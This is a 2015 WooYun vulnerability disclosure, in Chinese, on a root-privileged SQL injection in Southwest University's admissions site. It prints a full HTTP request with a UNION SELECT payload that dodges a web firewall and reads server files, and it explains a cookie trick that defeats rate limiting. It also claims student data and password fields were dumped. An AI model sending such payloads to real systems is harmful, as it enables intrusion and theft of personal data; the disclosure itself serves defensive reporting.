当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
西南大学某系统存在高权限SQL注入漏洞
相关厂商:
漏洞作者:
提交时间:
2015-07-23 12:02
修复时间:
2015-07-28 12:04
公开时间:
2015-07-28 12:04
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
16
漏洞状态:
已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

西南大学某系统存在高权限SQL注入漏洞,已确定可读可写档案

详细说明:

西南大学本科招生网存在高权限SQL Union Select注入漏洞,影响大量学生数据及少数成绩及榜单
尝试读取当前用户、mysql版本、当前数据库、数据路径
可发现当前数据库用户是高权限root账号

POST /zsjh/index.php HTTP/1.1
Host: bkzsw.swu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b627555b8dd7b4976e5459dc401d8bea; AJSTAT_ok_pages=3; AJSTAT_ok_times=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
nf=2011&ss=%E5%8C%97%E4%BA%AC&kl=%E6%90%86%E5%B7%A5'%09union%09select%09/*!30788user(),@@version,database(),@@datadir,LOAD_FILE('C:\boot.ini'),6,7*/%23

current_user.png


有趣的是,除了有安全狗之外,cookie中有一数值会纪录网页存取次数,太多次会拒绝联机。直接将他改为负数

cookie.png


数据库存有大量学生数据

dump1.png


dump2.png


dump3.png


可以捞取数据库用户字段

password.png


可以读档

read.png


可以写档

write.png


漏洞证明:

dump1.png


dump2.png


dump3.png

修复方案:

白名单过滤

版权声明:转载请注明来源 路人甲@乌云


>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-28 12:04

厂商回复:

最新状态:

暂无